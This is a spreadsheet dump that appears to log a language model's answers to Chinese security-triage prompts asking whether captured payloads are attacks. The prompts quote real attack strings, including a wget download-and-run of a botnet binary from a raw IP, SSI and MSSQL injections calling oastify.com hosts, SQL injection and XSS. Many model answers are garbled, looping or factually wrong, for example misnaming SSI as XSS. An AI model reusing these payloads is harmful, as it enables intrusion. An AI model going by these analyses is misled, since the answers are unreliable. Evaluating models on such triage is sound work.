http://180.101.234.99:8090/authenticationService/toPCLoginUniform.do?sysCode=E0001&amp;amp;typeCode=E0001&amp;amp;uKeySn=30022030031986&amp;amp;userType=c&amp;amp;licenceEntity=MIIFWTCCBQCgAwIBAgIPMgAAkTIFgzE4WRgoAFABMAoGCCqBHM9VAYN1MDUxMzAxBgNVBAoMKuaxn iLj ecgeW3peWVhuihjOaUv euoeeQhuWxgOS/oeaBr S4reW/gzAeFw0yMjExMjUwMDA2MjFaFw0yNzAxMjUwMDA2MjFaMDsxOTA3BgNVBAoMMOiLjW3nua0mS8puWFueiHquWKqOWMluacuuaisOiuvuWkh=&amp;amp;signText=pi0Pfh6oBhvTcaBDnsykqLBeVrPJYpdO2ZuyE9Vd0&amp;amp;signValue=MEUCIQDr3h/Z2mLbgcds6L0PekcnMXpsnXxkz5TPiDc1lchyXAIgIGBouFGnIg/bdjGw9z87xWuBVS18OrfR7UGcEwQtoE=&amp;amp;priarea=320000&amp;amp;login_pin=12345678</t>
        </is>
      </c>
      <c r="C55" t="inlineStr">
        <is>
          <t>9&amp;amp;client_ip=127.0.0.1&amp;amp;login_type=0&amp;amp;user_agent=Mozilla%2F5.0+compatible+ Safari%2F5.0+compatible+KHTML%2F4.0+compatible&amp;amp;referer=http%3A%2F%2Fwww.example.com&amp;amp;host=www.example.com&amp;amp;domain=example.com&amp;amp;uri=http%3A%2F%2Fwww.example.com%2Flogin.html&amp;amp;referrer=http%3A%2F%2Fwww.example.com&amp;amp;referer_title=Login+to+Example+Website&amp;amp;login_type=0&amp;amp;referer_type=0&amp;amp;sys_version=1.0&amp;amp;sys_build_version=10.0&amp;amp;sys_platform=Windows+7&amp;amp;sys_arch=x86&amp;amp;sys_os=Windows+7&amp;amp;sys_device=Not+Set&amp;amp;sys_username=admin&amp;amp;sys_password=admin&amp;amp;sys_language=en&amp;amp;sys_charset=UTF-8&amp;amp;sys_timezone=America%2FNew_York&amp;amp;sys_region=US&amp;amp;sys_theme=default&amp;amp;sys_skin=default&amp;amp;sys_features=default&amp;amp;sys_status=online&amp;amp;sys_version_number=1.0&amp;amp;sys_build_version_number=10.0&amp;amp;sys_platform_name=Windows+7&amp;amp;sys_arch_name=x86&amp;amp;sys_os_name=Windows+7&amp;amp;sys_device_name=Not+Set&amp;amp;sys_username_name=admin&amp;amp;sys_password_name=admin&amp;amp;sys_language_name=en&amp;amp;sys_charset_name=UTF-8&amp;amp;sys_timezone_name=America%2FNew_York&amp;amp;sys_region_name=US&amp;amp;sys_theme_name=default&amp;amp;sys_skin_name=default&amp;amp;sys_features_name=default&amp;amp;sys_status_name=online&amp;amp;sys_version_number_name=1.0&amp;amp;sys_build_version_number_name=10.0&amp;amp;sys_platform_name_name=Windows+7&amp;amp;sys_arch_name_name=x86&amp;amp;sys_os_name_name=Windows+7&amp;amp;sys_device_name_name=Not+Set&amp;amp;sys_username_name_name=admin&amp;amp;sys_password_name_name=admin&amp;amp;sys_language_name_name=en&amp;amp;sys_charset_name_name=UTF-8&amp;amp;sys_timezone_name_name=America%2FNew_York&amp;amp;sys_region_name_name=US&amp;amp;sys_theme_name_name=default&amp;amp;sys_skin_name_name=default&amp;amp;sys_features_name_name=default&amp;amp;sys_status_name_name=online&amp;amp;sys_version_number_name=1.0&amp;amp;sys_build_version_number_name=10.0&amp;amp;sys_platform_name_name=Windows+7&amp;amp;sys_arch_name_name=x86&amp;amp;sys_os_name_name=Windows+7&amp;amp;sys_device_name_name=Not+Set&amp;amp;sys_username_name_name=admin&amp;amp;sys_password_name_name=admin&amp;amp;sys_language_name_name=en&amp;amp;sys_charset_name_name=UTF-8&amp;amp;sys_timezone_name_name=America%2FNew_York&amp;amp;sys_region_name_name=US&amp;amp;sys_theme_name_name=default&amp;amp;sys_skin_name_name=default&amp;amp;sys_features_name_name=default&amp;amp;sys_status_name_name=online&amp;amp;sys_version_number_name=1.0&amp;amp;sys_build_version_number_name=10.0&amp;amp;sys_platform_name_name=Windows+7&amp;amp;sys_arch_name_name=x86&amp;amp;sys_os_name_name=Windows+7&amp;amp;sys_device_name_name=Not+Set&amp;amp;sys_username_name_name=admin&amp;amp;sys_password_name_name=admin&amp;amp;sys_language_name_name=en&amp;amp;sys_charset_name_name=UTF-8&amp;amp;sys_timezone_name_name=America%2FNew_York&amp;amp;sys_region_name_name=US&amp;amp;sys_theme_name_name=default&amp;amp;sys_skin_name_name=default&amp;amp;sys_features_name_name=default&amp;amp;sys_status_name_name=online&amp;amp;sys_version_number_name=1.0&amp;amp;sys_build_version_number_name=10.0&amp;amp;sys_platform_name_name=Windows+7&amp;amp;sys_arch_name_name=x86&amp;amp;sys_os_name_name=Windows+7&amp;amp;sys_device_name_name=Not+Set&amp;amp;sys_username_name_name=admin&amp;amp;sys_password_name_name=admin&amp;amp;sys_language_name_name=en&amp;amp;sys_charset_name_name=UTF-8&amp;amp;sys_timezone_name_name=America%2FNew_York&amp;amp;sys_region_name_name=US&amp;amp;sys_theme_name_name=default&amp;amp;sys_skin_name_name=default&amp;amp;sys_features_name_name=default&amp;amp;sys_status_name_name=online&amp;amp;sys_version_number_name=1.0&amp;amp;sys_build_version_number_name=10.0&amp;amp;sys_platform_name_name=Windows+7&amp;amp;sys_arch_name_name=x86&amp;amp;sys_os_name_name=Windows+7&amp;amp;sys_device_name_name=Not+Set&amp;amp;sys_username_name_name=admin&amp;amp;sys_password_name_name=admin&amp;amp;sys_language_name_name=en&amp;amp;sys_charset_name_name=UTF-8&amp;amp;sys_timezone_name_name=America%2FNew_York&amp;amp;sys_region_name_name=US&amp;amp;sys_theme_name_name=default&amp;amp;sys_skin_name_name=default&amp;amp;sys_features_name_name=default&amp;amp;sys_status_name_name</t>
        </is>
      </c>
      <c r="D55" t="n">
        <v>39.59582376480103</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="1" t="n">
        <v>54</v>
      </c>
      <c r="B56" t="inlineStr">
        <is>
          <t>这是一个网络攻击吗？
http://www.website.com/encode?type=3&amp;id=1'%20and%201=2%20UNION%20SELECT%201,database(),3%20--+</t>
        </is>
      </c>
      <c r="C56" t="inlineStr">
        <is>
          <t>%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t>
        </is>
      </c>
      <c r="D56" t="n">
        <v>49.16521906852722</v>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="1" t="n">
        <v>55</v>
      </c>
      <c r="B57" t="inlineStr">
        <is>
          <t>网络安全产品发现以下Payload，判断这是否是一次攻击
queryString=aaaa\u0027+#{16*8787}+\u0027b</t>
        </is>
      </c>
      <c r="C57" t="inlineStr">
        <is>
          <t>\u0030\u0031\u0033\u0034\u0035\u0036\u0037\u0038\u0039\u0040\u0041\u0042\u0043\u0044\u0045\u0046\u0047\u0048\u0049\u004a\u004b\u004c\u004d\u004e\u004f\u0050\u0051\u0052\u0053\u0054\u0055\u0056\u0057\u0058\u0059\u005a\u005b\u005c\u005d\u005e\u005f\u0060\u0061\u0062\u0063\u0064\u0065\u0066\u0067\u0068\u0069\u006a\u006b\u006c\u006d\u006e\u006f\u0070\u0071\u0072\u0073\u0074\u0075\u0076\u0077\u0078\u0079\u007a\u007b\u007c\u007d\u007e\u007f\u0080\u0081\u0082\u0083\u0084\u0085\u0086\u0087\u0088\u0089\u008a\u008b\u008c\u008d\u008e\u008f\u0090\u0091\u0092\u0093\u0094\u0095\u0096\u0097\u0098\u0099\u009a\u009b\u009c\u009d\u009e\u009f\u00a0\u00a1\u00a2\u00a3\u00a4\u00a5\u00a6\u00a7\u00a8\u00a9\u00aa\u00ab\u00ac\u00ad\u00ae\u00af\u00b0\u00b1\u00b2\u00b3\u00b4\u00b5\u00b6\u00b7\u00b8\u00b9\u00ba\u00bb\u00bc\u00bd\u00be\u00bf\u00c0\u00c1\u00c2\u00c3\u00c4\u00c5\u00c6\u00c7\u00c8\u00c9\u00ca\u00cb\u00cc\u00cd\u00ce\u00cf\u00d0\u00d1\u00d2\u00d3\u00d4\u00d5\u00d6\u00d7\u00d8\u00d9\u00da\u00db\u00dc\u00dd\u00de\u00df\u00e0\u00e1\u00e2\u00e3\u00e4\u00e5\u00e6\u00e7\u00e8\u00e9\u00ea\u00eb\u00ec\u00ed\u00ee\u00ef\u00f0\u00f1\u00f2\u00f3\u00f4\u00f5\u00f6\u00f7\u00f8\u00f9\u00fa\u00fb\u00fc\u00fd\u00fe\u00ff
```
This payload is a combination of ASCII characters and Unicode characters, including some non-printable characters. It is not a valid HTTP request or response, and it is likely that it is a part of a malware or phishing attack.
Some of the characters in the payload are:
* `aaaa`: This is a common ASCII character used in phishing attacks.
* `\u0027`: This is a Unicode character that represents a right single quote. It is often used in phishing attacks to create a legitimate-looking URL.
* `+`: This is a common ASCII character used to represent a space or a tab character in a URL.
* `#{16*8787}`: This is a Java-style syntax for representing a hexadecimal number. The number `16*8787` is likely a random value used to create a unique identifier for the attack.
* `b`: This is a Unicode character that represents a backspace character. It is often used in phishing attacks to create a legitimate-looking URL.
* `\u0030\u0031\u0033\u0034\u0035\u0036\u0037\u0038\u0039\u0040\u0041\u0042\u0043\u0044\u0045\u0046\u0047\u0048\u0049\u004a\u004b\u004c\u004d\u004e\u004f\u0050\u0051\u0052\u0053\u0054\u0055\u0056\u0057\u0058\u0059\u005a\u005b\u005c\u005d\u005e\u005f\u0060\u0061\u0062\u0063\u0064\u0065\u0066\u0067\u0068\u0069\u006a\u006b\u006c\u006d\u006e\u006f\u0070\u0071\u0072\u0073\u0074\u0075\u0076\u0077\u0078\u0079\u007a\u007b\u007c\u007d\u007e\u007f\u0080\u0081\u0082\u0083\u0084\u0085\u0086\u0087\u0088\u0089\u008a\u008b\u008c\u008d\u008e\u008f\u0090\u0091\u0092\u0093\u0094\u0095\u0096\u0097\u00</t>
        </is>
      </c>
      <c r="D57" t="n">
        <v>49.36918473243713</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="1" t="n">
        <v>56</v>
      </c>
      <c r="B58" t="inlineStr">
        <is>
          <t>网络安全产品发现以下Payload，判断这是否是一次攻击
orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://2.59.255.77/fbot.mipsel; chmod +x fbot.mipsel; ./fbot.mipsel rt.mpsl; #</t>
        </is>
      </c>
      <c r="C58" t="inlineStr">
        <is>
          <t>A payload to exploit the vulnerability
The payload is designed to exploit a vulnerability in a web application by executing a series of commands. The payload is encoded in base64 and contains the following components:
1. `wget`: This command downloads a file from a remote server. In this case, it downloads a file named `fbot.mipsel` from the IP address `2.59.255.77`.
2. `chmod`: This command changes the permissions of the `fbot.mipsel` file to make it executable.
3. `./fbot.mipsel`: This command executes the `fbot.mipsel` file.
4. `rt.mpsl`: This is the target of the attack, a web application with the name `rt.mpsl`.
The payload is likely intended to be used in a cyber attack to exploit a vulnerability in the `rt.mpsl` web application. The payload is designed to execute a series of commands on the target system, potentially leading to unauthorized access or data breaches.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D58" t="n">
        <v>5.966301918029785</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="1" t="n">
        <v>57</v>
      </c>
      <c r="B59" t="inlineStr">
        <is>
          <t>判断这是否是一个网络攻击？
http://www.gov1.com//col/col172743/index.html?'--&gt;'--&gt;`--&gt;&lt;!--#set var='2sk' value='1rj9wmatwz'--&gt;&lt;!--#set var='4um' value='3tlbyocvy1'--&gt;&lt;!--#echo var='2sk'--&gt;&lt;!--#echo var='4um'--&gt;&lt;!--#exec cmd='nslookup -q=cname oe6wj9xgjmgiqgokdcg495oogfmba56tyrml9bx0.oastify.com' --&gt;=1</t>
        </is>
      </c>
      <c r="C59" t="inlineStr">
        <is>
          <t>"&gt;
This is a URL that looks like a cross-site scripting (XSS) attack. The URL contains malicious JavaScript code that could potentially execute on the victim's machine if they click on the link or enter the URL in their browser.
Here's a breakdown of the URL:
* `http://www.gov1.com`: This is the domain name of the website that is hosting the malicious code.
* `/col/col172743/index.html`: This is the path to the page on the website that contains the malicious code.
* `?'--&gt;'`: This is a query string that starts the URL.
* `--&gt;` : This is a HTML entity that represents a right angle quotation mark.
* `&lt;!--#set var='2sk' value='1rj9wmatwz'--&gt;` : This is a comment that starts a JavaScript code block. The code block sets a variable `2sk` to the value `1rj9wmatwz`.
* `&lt;!--#set var='4um' value='3tlbyocvy1'--&gt;` : This is another comment that starts a JavaScript code block. The code block sets a variable `4um` to the value `3tlbyocvy1`.
* `&lt;!#echo var='2sk'--&gt;` : This is a comment that starts a JavaScript code block that echoes the value of the `2sk` variable.
* `&lt;!#echo var='4um'--&gt;` : This is another comment that starts a JavaScript code block that echoes the value of the `4um` variable.
* `&lt;!#exec cmd='nslookup -q=cname oe6wj9xgjmgiqgokdcg495oogfmba56tyrml9bx0.oastify.com' --&gt;=1"&gt; : This is a comment that starts a Windows Command Prompt command. The command looks for the CNAME record of `oe6wj9xgjmgiqgokdcg495oogfmba56tyrml9bx0.oastify.com` and sets a variable `=1` if the record is found.
The malicious code in this URL could potentially execute on the victim's machine if they click on the link or enter the URL in their browser. The code could be used to steal login credentials, install malware, or perform other malicious actions.
It is important to avoid clicking on links or entering URLs that could potentially execute malicious code. If you are unsure about the legitimacy of a URL, you can hover over the link to see the URL in the address bar of your browser, or you can manually enter the URL in your browser to test it.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D59" t="n">
        <v>14.84000468254089</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="1" t="n">
        <v>58</v>
      </c>
      <c r="B60" t="inlineStr">
        <is>
          <t>判断这是否是一个网络攻击
http://www.gov1.com/jszwfw/publicservice/itemlist/showDetail.do?webId=1);declare @q varchar(99);set @q='\\ltity6cdyjvf5d3hs9v1o23lvc18p7jvanyel49t.oasti'+'fy.com\fah'; exec master.dbo.xp_dirtree @q;-- &amp;iddept_ql_inf=11320000696785044Q2322007019000&amp;ql_kind</t>
        </is>
      </c>
      <c r="C60">
        <f>3&amp;qr_mid=242912&amp;qr_sn=395059114021&amp;qr_fmid=242912&amp;qr_id=395059114021&amp;qr_did=242912&amp;qr_ipp=242912&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qv=103&amp;qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_</f>
        <v/>
      </c>
      <c r="D60" t="n">
        <v>47.08663654327393</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="1" t="n">
        <v>59</v>
      </c>
      <c r="B61" t="inlineStr">
        <is>
          <t>这个url中存在转义的字符，请还原，并判断这是否是一个网络攻击吗？
http://218.94.159.228:8088/pqrm/framework/jsonm.jsp?exp_path=mobile.controlservice&amp;amp;info=serviceName=synInfo2Server&amp;amp;domain=pqrm&amp;amp;loginId=njtest61&amp;amp;uuid=null&amp;amp;actionName=doService&amp;amp;origin=imobile&amp;amp;param=planSubDetailJson={&amp;quot;pro_linkman&amp;quot;:&amp;quot;&amp;#65533;&amp;#756;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;pro_tel&amp;quot;:&amp;quot;0510-68555000&amp;quot;,&amp;quot;eco_outside&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_code&amp;quot;:&amp;quot;20230508205&amp;quot;,&amp;quot;check_type&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;task_source_id&amp;quot;:&amp;quot;A100&amp;quot;,&amp;quot;eco_single&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;state&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;729736&amp;quot;,&amp;quot;pro_cert_code&amp;quot;:&amp;quot;00119Q33182R4M/3200&amp;quot;,&amp;quot;goods_copy_local&amp;quot;:&amp;quot;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1852;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1205;&amp;quot;,&amp;quot;pro_quality_pass&amp;quot;:&amp;quot;0&amp;quot;,&amp;quot;pro_present&amp;quot;:&amp;quot;&amp;#65533;&amp;#755;&amp;#65533;&amp;quot;,&amp;quot;goods_copy_num&amp;quot;:&amp;quot;2.5&amp;#445;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;goods_sale_year&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;goods_man_consignment&amp;quot;:&amp;quot;0&amp;quot;,&amp;quot;pro_name&amp;quot;:&amp;quot;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1590;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#619;&amp;#65533;&amp;#65533;&amp;#1520;&amp;#65533;&amp;#631;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1977;&amp;#65533;&amp;#766;&amp;quot;,&amp;quot;goods_copy_num_measurement&amp;quot;:&amp;quot;&amp;#445;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;task_source&amp;quot;:&amp;quot;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#673;&amp;#65533;&amp;#1075;&amp;#65533;</t>
        </is>
      </c>
      <c r="C61" t="inlineStr">
        <is>
          <t>&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1041;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;plan_level&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;plan_date&amp;quot;:&amp;quot;2023-05-08&amp;quot;,&amp;quot;plan_person&amp;quot;:&amp;quot;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;plan_content&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_id&amp;quot;:&amp;quot;729736&amp;quot;,&amp;quot;plan_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_id&amp;quot;:&amp;quot;A100&amp;quot;,&amp;quot;task_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;action_id&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;action_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;action_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;action_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;check_id&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;check_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;check_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;check_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_state&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;task_status&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_create_time&amp;quot;:&amp;quot;2023-05-08&amp;quot;,&amp;quot;task_update_time&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_create_user&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_update_user&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_id&amp;quot;:&amp;quot;A100&amp;quot;,&amp;quot;plan_id&amp;quot;:&amp;quot;729736&amp;quot;,&amp;quot;plan_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_remark&amp;quot;:&amp;quot;&amp;quot;&amp;quot;,&amp;quot;action_id&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;action_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;action_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;action_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;check_id&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;check_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;check_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;check_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_state&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;task_status&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_create_time&amp;quot;:&amp;quot;2023-05-08&amp;quot;,&amp;quot;task_update_time&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_create_user&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_update_user&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_remark&amp;quot;:&amp;quot;&amp;quot;&amp;quot;}
这是一个JSON格式的数据，它包含了一个网络攻击的请求，包括一个恶意的 action id=1，这可能是一个跟踪或者黑客的攻击。
请根据以下几点进行分析：
1. 检查action id=1的具体值，是否为预期的值？如果不是，则</t>
        </is>
      </c>
      <c r="D61" t="n">
        <v>29.26144742965698</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="1" t="n">
        <v>60</v>
      </c>
      <c r="B62" t="inlineStr">
        <is>
          <t>这是一个网络攻击吗？
http://www.website.com/encode?type=3&amp;id=1%3Cscript%3Ealert(%22xss%22)%3C/script%3E</t>
        </is>
      </c>
      <c r="C62" t="inlineStr">
        <is>
          <t>I'm not sure if this is a legitimate URL or not, but it appears to be an attempt at injecting malicious code into a website. The URL contains a query parameter "type" which is set to "3", and the value of the "id" parameter is "1". The script tag inside the URL contains the string "alert('xss')", which is likely an attempt to inject an XSS (Cross-Site Scripting) attack.
It's important to be cautious when clicking on links or entering query parameters into a website, as they can potentially expose your system to malware or other security threats. If you did not intentionally click on this link or enter the query parameter, you may want to check your system for any potential malware or security threats.
In general, it's a good idea to be cautious when encountering unfamiliar or suspicious URLs, and to avoid clicking on them or entering query parameters into them. If you're unsure about the legitimacy of a URL, you can use a URL scanning tool or check the website's security status using a tool like Google's Safe Browsing.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D62" t="n">
        <v>6.455928564071655</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="1" t="n">
        <v>61</v>
      </c>
      <c r="B63" t="inlineStr">
        <is>
          <t>这是一个网络攻击吗？
http://www.website.com/encode?type=3&amp;id=1&lt;script&gt;alert("xss")&lt;/script&gt;</t>
        </is>
      </c>
      <c r="C63" t="inlineStr">
        <is>
          <t>在这个例子中，我们可以看到一个 Query String，它包含一个名为 "type" 的参数，以及一个叫做 "id" 的参数。当用户访问这个网站时，这个 Query String 将被送到服务器进行处理。
现在，我们可以通过在服务器端添加一个特殊的字符串来利用这个弱点。例如，我们可以在服务器端的 encode.php 文件中添加以下代码：
&lt;?php
// 从 Query String 中提取 "type" 和 "id" 参数
$type = $_GET["type"];
$id = $_GET["id"];
// 将 "type" 和 "id" 参数经过 HTML Entity 编码
$type_encoded = htmlentities($type, ENT_QUOTES);
$id_encoded = htmlentities($id, ENT_QUOTES);
// 将 "type" 和 "id" 参数嵌入 JavaScript 脚本中
$script = "alert('$type_encoded')";
$script .= "alert('$id_encoded')";
// 将脚本内容发送给客户端
echo $script;
?&gt;
在上面的代码中，我们首先从 Query String 中提取 "type" 和 "id" 参数。然后，我们将这两个参数经过 HTML Entity 编码，以便在客户端上执行 JavaScript 脚本。最后，我们将脚本内容发送给客户端，以便在用户访问网站时执行。
现在，当用户访问这个网站时，他们会收到两个警告。这是因为我们在服务器端添加了一个特殊的字符串，使得客户端执行 JavaScript 脚本。这个弱点可以被利用来攻击用户，例如，通过在脚本中发送 cookies，获取用户的个人信息等。
因此，在实际应用中，你应该仔细 considre 和检查你的网站代码，以确保它们不会导致 security 问题。具体来说，你可以尝试使用 HTTPS 协议，以便在网络通信中使用 SSL/TLS 加密，从而防止攻击者 intercept 和读取你的网站数据。
总之，这个例子只是一个简单的示例，以 illustratere  the concept of SQL injection attacks。在实际应用中，你需要更加严格地防范攻击者，以确保你的网站的安全性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D63" t="n">
        <v>19.90721702575684</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="1" t="n">
        <v>62</v>
      </c>
      <c r="B64" t="inlineStr">
        <is>
          <t>XSS攻击有哪些特征？</t>
        </is>
      </c>
      <c r="C64" t="inlineStr">
        <is>
          <t>XSS攻击是一种常见的web应用安全漏洞，可以通过在web应用中嵌入恶意脚本来执行未经授权的操作。下面是XSS攻击的一些特征：
1. 嵌入恶意脚本：XSS攻击者可以通过在web应用的输入fields中嵌入恶意脚本，例如在输入框中嵌入`&lt;script&gt;...&lt;/script&gt;`。
2. 利用user input：XSS攻击者可以通过利用用户输入，例如username，password，或者其他用户输入，来嵌入恶意脚本。
3. 细分攻击：XSS攻击者可以通过在多个位置嵌入恶意脚本，例如在页面上方、下方、或者在一个input框中。
4. 动态脚本：XSS攻击者可以使用动态脚本，例如在page load时执行的脚本，或者在button click时执行的脚本。
5. 非常的简单：XSS攻击可以非常简单，只需要在web应用的输入fields中嵌入一些恶意脚本，就能够执行非法操作。
6. 隐蔽性：XSS攻击可以很隐蔽，只有在某些特定的情况下，例如在浏览器的console中，才能够检测到攻击。
7. 细分攻击：XSS攻击者可以通过在多个位置嵌入恶意脚本，例如在页面上方、下方、或者在一个input框中。
8. 自动执行：XSS攻击者可以使用javascript来自动执行恶意脚本，例如在page load时执行的脚本。
9. 具有高危险性：XSS攻击可以具有很高的危险性，可以让攻击者获得特权、抓取数据、执行恶意操作等。
10. 难以防御：XSS攻击可以难以防御，因为它可以通过利用用户输入，而不是直接攻击web应用。
总之，XSS攻击是一种常见的web应用安全漏洞，可以通过嵌入恶意脚本来执行未经授权的操作。因此，应该按照安全 beste practices来防止XSS攻击。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D64" t="n">
        <v>20.97588515281677</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="1" t="n">
        <v>63</v>
      </c>
      <c r="B65" t="inlineStr">
        <is>
          <t>如何判断主机是否被入侵？</t>
        </is>
      </c>
      <c r="C65" t="inlineStr">
        <is>
          <t>在Network Security中，一个重要的任务是判断主机是否被入侵。这可以通过监控主机的网络活动，确定是否有恶意的网络流量或活动来完成。以下是一些常见的方法：
1. 监控主机的网络流量：通过监控主机的网络流量，可以确定是否有恶意的网络流量或活动。例如，如果主机的网络流量异常增长，或者网络流量中存在恶意的文件或网络协议，这可能是入侵行为。
2. 监控主机的系统运行时间：通过监控主机的系统运行时间，可以确定是否有恶意的程序或软件运行。如果主机的系统运行时间异常增长，或者系统运行时间中存在恶意的程序或软件，这可能是入侵行为。
3. 监控主机的系统文件：通过监控主机的系统文件，可以确定是否有恶意的文件或目录在系统中。如果主机的系统文件中存在恶意的文件或目录，这可能是入侵行为。
4. 监控主机的网络配置：通过监控主机的网络配置，可以确定是否有恶意的网络配置。如果主机的网络配置中存在恶意的网络设置，这可能是入侵行为。
5. 使用入侵检测软件：可以使用入侵检测软件来监控主机的网络活动，以确定是否有恶意的网络流量或活动。这些软件可以检测到入侵行为，并提供有用的信息来帮助你做出决策。
6. 使用Network Monitoring Tools：Network Monitoring Tools可以帮助你监控主机的网络活动，以确定是否有恶意的网络流量或活动。这些工具可以提供有用的信息，帮助你了解主机的网络活动，并做出相应的决策。
7. 使用Intrusion Detection System（IDS）：IDS可以监控主机的网络活动，以确定是否有恶意的网络流量或活动。这些系统可以检测到入侵行为，并提供有用的信息来帮助你做出决策。
需要注意的是，这些方法并不是一个完美的监控方式，因为入侵行为可能会使主机的网络活动异常增长，而不是实际上的入侵行为。因此，在实施这些方法时，需要注意这些限制。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D65" t="n">
        <v>23.2702317237854</v>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="1" t="n">
        <v>64</v>
      </c>
      <c r="B66" t="inlineStr">
        <is>
          <t>数据泄露有哪些风险？</t>
        </is>
      </c>
      <c r="C66" t="inlineStr">
        <is>
          <t>数据泄露可能会导致多种风险和损失，以下是一些常见的风险：
1. 个人隐私泄露：数据泄露可能会导致个人个人隐私和安全受到损害，例如邮件、地址、生日等个人信息可能会被泄露。
2. 经济损失：数据泄露可能会导致经济损失，例如购物买或预订的详细信息、账户信息等可能会被泄露。
3. 安全漏洞：数据泄露可能会导致安全漏洞，例如针对攻击者可以使用泄露的数据来破解安全措施，进而访问敏感信息。
4. 骚扰和诋毁：数据泄露可能会导致骚扰和诋毁，例如邮件诋毁、恶意下载等。
5. 法律和诉讼问题：数据泄露可能会导致法律和诉讼问题，例如隐私权、诉讼权等。
6. 媒体和社会影响：数据泄露可能会导致媒体和社会影响，例如新闻报道、社会评论等。
7. 系统安全和稳定问题：数据泄露可能会导致系统安全和稳定问题，例如系统崩溃、数据损失等。
8. 反应时间和响应能力：数据泄露可能会导致反应时间和响应能力受到损害，例如不能及时地 реа应用或个人数据泄露等。
9. 数据损失和破坏：数据泄露可能会导致数据损失和破坏，例如数据丢失、逻辑损失等。
10. 系统快速追踪和识别：数据泄露可能会导致系统快速追踪和识别，例如使用泄露的数据来识别和追踪某个个人或组织。
总之，数据泄露可能会导致多种风险和损失，因此需要采取强制性的安全措施，例如使用加密、安全协议、数据加密等，以防止数据泄露。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D66" t="n">
        <v>23.01585340499878</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="1" t="n">
        <v>65</v>
      </c>
      <c r="B67" t="inlineStr">
        <is>
          <t>有哪些HIPS产品？</t>
        </is>
      </c>
      <c r="C67" t="inlineStr">
        <is>
          <t>&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D67" t="n">
        <v>0.2782504558563232</v>
      </c>
    </row>
